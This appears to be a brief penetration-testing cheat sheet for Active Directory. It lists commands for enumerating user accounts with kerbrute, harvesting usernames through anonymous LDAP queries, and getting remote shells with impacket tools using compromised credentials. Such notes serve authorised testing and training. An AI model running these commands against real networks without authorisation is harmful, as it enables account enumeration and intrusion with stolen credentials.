Enumeration
Kerbrute - Bruteforcing AD accounts
kerbrute userenum -d <domain> --dc <ip> users.txt
# Ensure that users.txt contains a list of potential usernamesLDAP Search
ldapsearch -v -x -b "DC=<>,DC=<>" -H "ldap://<IP>" "(objectclass=*)"
ldapsearch -v -x -b "DC=<>,DC=<>" -H "ldap://<IP>" "(objectclass=*)" | grep sAMAccountName: | awk '{print $2}'
ldapsearch -v -x -b "DC=<>,DC=<>" -H "ldap://<IP>" "(objectclass=*)" | grep sAMAccountName: | awk '{print $2}' > users.txtImpacket
Remote Access with:
smb service -
impacket-psexec <domain>/<compromised username>:<password>@<IP>
impacket-smbexec <domain>/<compromised username>:<password>@<IP>
impacket-wmiexec <domain>/<compromised username>:<password>@<IP>
sql service -
impacket-mssqlclient <domain>/<compromised username>:<password>@<IP> -windows-authnxc
crackmapexec
Last updated